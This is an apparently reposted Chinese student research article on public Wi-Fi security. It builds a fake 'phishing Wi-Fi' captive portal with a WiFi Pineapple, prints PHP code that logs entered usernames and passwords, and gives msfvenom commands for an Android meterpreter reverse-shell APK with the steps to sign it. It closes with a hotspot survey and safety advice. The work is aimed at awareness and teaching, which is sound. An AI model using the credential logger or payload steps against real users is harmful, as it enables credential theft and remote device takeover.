前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >基于Wifipineapple对无线安全情况的综合性调查与研究

基于Wifipineapple对无线安全情况的综合性调查与研究

作者头像
FB客服
发布2018-02-24 11:05:12
1.3K0
发布2018-02-24 11:05:12
举报
文章被收录于专栏:FreeBufFreeBuf

本项目已荣获2017年福建省第32届青少年科技创新大赛一等奖

摘要:通过设计并进行试验、实地调查等方式,对无线安全的情况进行综合性的调查与研究,最终提出合理化建议。利用无线安全审计设备 Wifipineapple 模拟出黑客所使用的“钓鱼 Wi-Fi”网页进行数据的收集和实际体验。试图做出对该类行为防范的反思和进一步的建议,提高人们对无线安全的重视意识。

关键词:无线网络安全 综合性调查和研究 无线安全审计 Wifipineapple Kali Linux 反思和建议

引言

在 21 世纪的今天,通过手机、平板电脑等设备上网已成为了人们生活中不可或缺的一部分,许多人已经拔掉了网线,通过无线连接的方式来连接到互联网。但近年来,越来越多的黑客通过无线局域网实现违法犯罪行为,这导致了许多人的个人财产和隐私被侵犯。许多地方出现了利用 Wi-Fi 来进行非法活动的现象,让许多人一不小心就成了受害者。本着创客的精神,我决定对这一现象进行探究,进行实际的实验测试,并试图找到破解这一现象可行的好方法、好建议。

1. 模拟出“钓鱼 Wi-Fi ”进行数据采集及实际操作实验

为了更好地收集、分析数据,更客观地进行研究调查,并体现所谓“钓鱼 Wi-Fi ”的原理,我决定仿造一个“钓鱼Wi-Fi”热点,来进行实验。我利用了一款无线安全审计设备——Wifipineapple(中文名:Wi-Fi 菠萝,下同)来进行模拟“钓鱼Wi-Fi”的实验和数据采集。

1.1 Wifipineapple 概况

Wifipineapple是一款在国外极受欢迎、十分易用的无线安全审计设备,由开源无线安全审计软件社区提供软件支持,但在国内使用的人数和范围较小,仅有部分爱好者使用,故国内网站可搜索到的资料较少。本次使用了两台型号为Wifipineapple Mark 5 Plus的设备(其中一台为备用机)。具体参数如下:

CPU:高通 SOC 400 MHz MIPS 运行内存:64 MB 储存:32 GB(主要用机)/16MB(备用机) 接口:1*USB 2.0,1*有线网口,1*SD卡接口,1*Micro USB 供电:内置6000mA聚合物锂电池 尺寸(长*宽*厚):107mm*64mm*22mm

2 “钓鱼Wi-Fi”原理的模拟

2.1 Wifipineapple的初步调试

为更好地完成此次模拟“钓鱼Wi-Fi”原理的实验,防止出现纰漏,需要在进行后续操作前对设备进行检查调试。我对设备进行了开机送电和USB接口、电源开关、以太网接口、SD卡插槽以及后台登陆操作等六项测试。在确保正常后,再开始进行下一步操作。

2.2 “钓鱼Wi-Fi”界面的制作、调试、实现

为了高仿真地仿造一个黑客在“钓鱼”时的工作过程,我们仿造黑客的工作原理制作了一个类似正规免费热点的“钓鱼Wi-Fi”,以便更好地进行研究。同理可证,在次实验的可行的基础上,登录界面还可以换成支付宝登录界面、CMCC登录界面等等,可以实现对信息的窃取。我模拟的“钓鱼Wi-Fi”将可以实现对登录信息的记录、对设备实时状态的监控以及对已连接的安卓设备的远程控制等功能。

2.2.1 “钓鱼Wi-Fi”的概况介绍

为了确保收集数据的合理性,确保项目在符合道德伦理以及合法的情况下进行,并考虑到自身因素,我决定将热点伪装成学校内部的免费Wi-Fi热点,用来实现实验以及相关数据的获取活动。为了确保连接者的个人信息安全,我会在实验结束后立即删除相关隐私数据和记录。

2.2.2 安装所需的插件

完成初始化配置后,在浏览器中输入http://172.16.42.1:1471/,选择左侧的Modules选项,点击Get Modules from WiFiPinapple.com选项,系统将会自动刷新出所有插件。这次,我选择了实验所需的三个插件:DNSspoof,Dwall,urlsnraf。逐个安装。安装后系统显示如图所示:

安装后,逐个打开插件,使插件进行工作,再加以定制,即完成了软件的个性化操作。

2.3 模拟“钓鱼Wi-Fi”Login登录界面的制作

钓鱼页面采用HTML和PHP语言编写,为了美观,前端采用了Bootstrap框架,在用户接入WiFi后,会自动重定向至该页面,随后用户会根据提示填入班级姓名,在点击登入按钮后,用户填入的信息会被记录在log.txt文件中,便于后续的操作以及数据的记录。具体代码如下:

<?php header("Content-type: text/html; charset=utf-8") $com1 = "$_GET[password]" $com2 = "$_GET[username]" $file = 'log.txt' $fp = @fopen($file, 'a') fwrite($fp,"\r\n$com2\r\n$com1") fclose($fp) ?> <?php header("Location: ok.html") exit; ?>

2.3.1 Login登录界面与Wifipineapple的整合

事先制作好模拟免费热点的Login登录界面。这次我模仿的是虚拟的学校Wi-Fi的认证界面。Login界面制作完成后,需要将界面与Wifipineapple进行整合。首先将所有文件复制到Wifipineapple中的/www/根目录下。接下来,重启Wifipineapple执行操作。重启后,在浏览器中输入http://172.16.42.1,可看到如图的界面。在相应的界面中按要求输入班级、姓名,点击登录以后,会出现“登陆成功”的提示完成界面,此时登录信息将会自动记录到系统/www/文件夹内。

2.4 通过模拟的“钓鱼Wi-Fi”实现对已连接安卓设备的远程控制

除了可以利用模拟的“钓鱼Wi-Fi”对已连接设备进行监控外,甚至还可以利用它对已连接的安卓设备进行远程控制。

2.4.1 使用Kali Linux制作.apk程序并签名

首先,使用预先安装好的Kali Linux系统上的Msfvenom应用编辑一个后缀名为.apk的文件,使程序可以在安卓设备上运行。打开终端提示符下输入命令,使用msfvenom工具来创建有效载荷APK文件:

msfvenom -p android/meterpreter/reversetcp LHOST=192.168.1128 LPORT=4444 R > /root/Desktop/test.apk

执行后,即可在输出目录查看到创建好的.apk文件了。执行下列命令签名,首先使用密钥工具创建密钥库:

keytool -genkey -v -keystore my-test.Keystore -alias test -keyalg RSA -keysize 2048 -validity 10000

然后使用JARsigner签名.apk:

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-test.Keystore test.apk test

再用JARsigner验证签名:

由于Kali Linux没有预装Zipalign,需要先执行apt-get install zipalign。然后用zipalign来验证.apk:

zipalign -v 4 test . ask main.apk

执行完上述操作后,我们就可以得到一个带有签名的.apk文件。

接下来,则可以使用Metasploit进行下一步操作。打开Metasploit,执行msfconsole打开控制台。接下来,执行:

注:代码中的IP地址和端口号应以实际情况而定。

即可完成所有操作,并将制作好的程序上传到模拟的“钓鱼Wi-Fi”热点。通过以上操作,我们可以发现,在连接未知的热点时,除了自己的个人信息会被盗取外,自己的设备甚至也可以被随意控制。这对我们的个人隐私和财产安全都造成了巨大的威胁。

2.5 利用Wifipineapple制作的“钓鱼Wi-Fi”的实际尝试

在制作完上述的钓鱼界面后,我们进行了实际的测验。我建立了一个名为“FreeWiFi-Jianjin”的未加密热点。打开热点,开始工作,使用智能手机(安卓系统)连接该热点,打开浏览器,输入http://172.16.42.1,即可见到如上图的界面。在输入个人信息后,将会自动跳转出一个“登录成功”的提示。而此时,刚刚输入的信息则会被记录到Wifipineapple后台根目录文件的/www/目录中。例如,我在班级中输入“八年十四班”,姓名中输入“XXX”,则立刻在后台的文件下就可以看到输入的“八年十四班”和“XXX”等文字,一些不法分子盗用银行卡密码等个人数据就是采用此等方式。此外,在Wifipineapple的控制界面,还可以随意看到连接热点的手机正在进行操作的情况的截图。

2.5.1 Wifipineapple制作的“钓鱼Wi-Fi”后台信息收集的展示

在上文中login登录界面制作完成后,使用设备连接Wi-Fi,进入浏览器,在地址栏内输入172.16.42.1,即可进入相应的界面。在界面中输入“班级”和“姓名”后,输入的信息将会自动记录到Wifipineapple后台的/www/文件夹下,我则可以轻易地查看到信息。同理可证,如果把界面换成支付宝的支付界面或者是CMCC的登录界面,不明就里的人的信息同样会被这样记录下来,不法分子同样可以利用此原理获取账号、密码,并实行不法犯罪。这种行为的危害性不言而喻,而一般人通过普通的安全软件也无法鉴别出连接的无线局域网是否安全。如,我在界面中输入班级、姓名,在显示登录成功后,个人信息在后台中则可以显示出来。

2.6 对连接“钓鱼Wi-Fi”的设备状态的实时监控的展示

除了上述记录数据的功能外,Wifipineapple还可实现对连接设备状态的实时监控,实现对设备正在进行的任务和活动进行监控和盗取数据的目的。在设备连接后,可以在Wifipineapple管理后台中的D-Wall插件中查看到设备实时的状态。具体查看的过程如下:

1、 在浏览器中输入http://172.16.24.1:1471,进入Wifipineapple后台。

2、 进入D-Wall插件,并使D-Wall插件开始工作。

3、 将设备连接至热点,即可看到手机所在进行的任务(手机型号:Redmi 3s)。

从上述图片中可以看出,利用这个“钓鱼Wi-Fi”,犯罪分子可以轻而易举地窥探到你的隐私,对这些信息稍加解密,所有隐私就会完全暴露在犯罪分子的眼皮底下。同时,如果你的个人聊天记录或者私密文件被犯罪分子非法窃取,那么损失将会是不可估量的。

2.7 对“钓鱼Wi-Fi”的安全性检测

目前,市面上的许多软件都带有“检测Wi-Fi安全性”的功能。为了鉴别此类软件是否有效,也为了鉴别本次实验的“钓鱼Wi-Fi”伪装是否到位,我利用手机上安装的安全软件进行了一次安全性检测。本次利用了“360免费Wi-Fi”这款市面上比较流行的软件进行检测。具体的结果如图所示。

可见,在成功连接我制作的“钓鱼Wi-Fi”后,即使是主流的手机Wi-Fi软件检测软件,也无法检测出它的安全性,甚至被它所迷惑。由此可见,黑客若要伪装,则可以完全把“钓鱼Wi-Fi”伪装成与安全的Wi-Fi一样的模式。因此,我们在外时一定要注意网络安全,不要随意连接不明的Wi-Fi,就算要连接,也要多留一个心眼,以免自己的个人隐私和财产安全受到损失。

2.8 对数据的合法化处理

为了使此次试验符合道德、法律与伦理的三重共同要求,并不使隐私泄露,做到安全最大化,我在此郑重承诺:在试验中,所有数据展示均选取了无关个人隐私的数据,保证数据的合法性、安全性,并在使用过后立即销毁,保证任何隐私不受外界干扰和窃取,保证符合中华人民共和国相关互联网法律之规定。

2.9 对上述“钓鱼”活动的总结

通过上述尝试,我可以发现,黑客利用此类钓鱼热点,可以轻而易举地获取到我们的账号密码,还可以偷窥到我们的隐私,甚至可以直接控制我们的设备,这是何等的可怕啊!目前屡见不鲜的支付宝、银行卡账号失窃、银行卡遭到盗刷的案件很大一部分就是利用此原理完成的。同样,我还可以把登录界面制作成CMCC热点的登录界面来骗取上网密码,同理可证,可以仿造的页面有很多,甚至可以窃取到你个人QQ、微信的账号以及密码。此外,在连接了此类热点后,你的个人隐私将会被一览无遗,你的手机正在浏览界面的状态的实时截屏将会一五一十地发送到后台,犯罪分子只要进行简单的解密就可以查看,并窃取相关信息,作为己用。因此,在外时一定要注意手机连接热点的安全,不要使不法分子有了可乘之机。

3. 对市区内各热点安全性的实地调查

在经过了之前的网络调查与原理实验后,我们决定就本市的具体情况,开展一次实地调查,范围在市区内,主要调查市区内公共热点的布置、连接流量及安全情况。

3.1 对市区内公共热点布置情况的调查

经过实际的走访、调查与观察后,我们发现,在市中心繁华区域,有许多的的热点分布,其中一大部分是公共热点。而公共热点又主要分为两大类:第一类是由餐厅、咖啡馆等商家自行提供的热点,在一定范围内信号较强;第二类是由中国移动、中国电信、中国联通提供的收费热点服务(三大运营商提供的收费热点名称分别为:中国移动:CMCC;中国电信:ChinaNet;中国联通:Chinaunicom),信号适中。

3.2 对两类热点的抽样调查

为了更具体地了解三类热点的具体情况,我又逐一对三类热点各抽取了一个,进行实际连接的调查。

我首先对第一类热点进行了调查。我来到市区内某家茶餐厅,对该店的免费热点进行了调查。经调查后发现,该店的热点总体信号较强,在连接人数较多的情况下,仍能保持较流畅的速度。但该热点的连接方式并非为普通的秘钥连接,而是采用了商家普遍采用的网页连接方式,且要求输入手机号、获取验证码后才可连接。这样的连接方式,无疑会给不法分子有了可乘之机。所谓的“钓鱼WiFi”通常就是伪装成这样需要通过网页连接的热点,从而在受害者连接后达到犯罪的目的。

接着,我对第二类热点进行了调查。我们抽取了中国电信的ChinaNet热点进行了调查。我来到了市区内该热点信号最强的地方之一——解放路中国电信营业厅进行连接调查。通常,这类由运营商运营的热点是需要收费的热点,也是通过网页连接,但需要在连接界面输入提前注册好的账号、密码才可正常使用。这类热点虽然比第一类热点安全系数更高,但仍然有可乘之机(例如使用Wifipineapple克隆该类热点的网页,盗取用户的付费账号密码)。

4. 对本次活动的总结

通过此次系统地调查,使我深刻地理解到了无线局域网的安全漏洞之大。我通过一个实验,模拟了不法分子进行违法犯罪的原理,凸显了无线局域网安全的薄弱。目前此类犯罪之多正是因为广大群众的提防意识不够造成的,如果我们能够提高这方面的意识,我们则可以在很大的程度上预防这类犯罪,使我们的财产、个人隐私安全最大化。

5. 提出建议

通过之前的调查,我们对无线网络安全有了一个更深入的理解,当然,对目前层出不穷的利用无线网络实施犯罪的现象,也有了一些自己的建议和看法。我们提出了以下几点建议:

无线局域网相对于蜂窝移动数据,是一种更快捷、资费更低的连接方式,但若要选择无线局域网连接,请尽量连接自家的热点或是自己已知安全的热点。若连接了不明的热点,个人隐私和财产安全就很有可能受到损失。

在外出时,若要连接互联网,请不要贪图便宜,尽量使用蜂窝移动数据连接。

若实在要连接公共热点,要在确认热点安全的情况下连接。

连接已知安全的热点。现在有很多软件(如平安Wi-Fi、360免费Wi-Fi等)已经提供了热点分享和认证服务,若要连接公共热点,应尽量连接软件内官方确认安全的热点。但尽量不要连接除认证热点外的未知热点,因为那些热点的安全性未知,也很容易绕过该类软件的检测。

使用公共热点时,尽量不要使用支付宝、微信等支付服务或进行手机银行转账、购物等,避免造成不必要的损失。若要使用上述服务,请务必使用蜂窝移动数据连接。

多加了解互联网安全知识,时时绷着一根弦,警惕生活中时常发生的不法行为。

6. 待改进的地方

(1)自动热点登录界面尚未实现自动跳转,后续工程中可添加,以更好地仿真

(2)在后续工作中可以将此实验作为一个教学的道具,供中小学信息技术课讲授无线网络安全知识或是在普及无线网络安全知识时作为演示。

(3)可以进一步将实验中的截图解密,做到更直观的演示。

结语

在多方面的支持下,我成功完成了这次调查,在此就不逐一表达谢意。调查的结果也十分引人深思。被“钓鱼Wi-Fi”盗取财产或是侵犯权益的事件时有发生的原因有很多,但我认为,最根本的原因莫过于人们的防范意识不够或是有一种爱贪小便宜的心理在作祟,这也正给了不法分子可乘之机。避免此类事件不再发生的方法其实很简单。首先,大家必须提高自己的防范意识,不要为了一点通讯资费而随意连接不安全的无线热点,而是尽量使用安全的网络或是蜂窝移动数据上网。这样,不法分子就不会有可乘之机。希望这次调查可以引起大家对互联网安全的足够重视!

参考文献:《Kali Linux& Back Track渗透测试实战》 (韩)赵涎元 著 金光爱 译

鸣谢

所有提出宝贵意见的人士

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2017-04-07,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 FreeBuf 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
验证码
腾讯云新一代行为验证码(Captcha),基于十道安全栅栏, 为网页、App、小程序开发者打造立体、全面的人机验证。最大程度保护注册登录、活动秒杀、点赞发帖、数据保护等各大场景下业务安全的同时,提供更精细化的用户体验。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档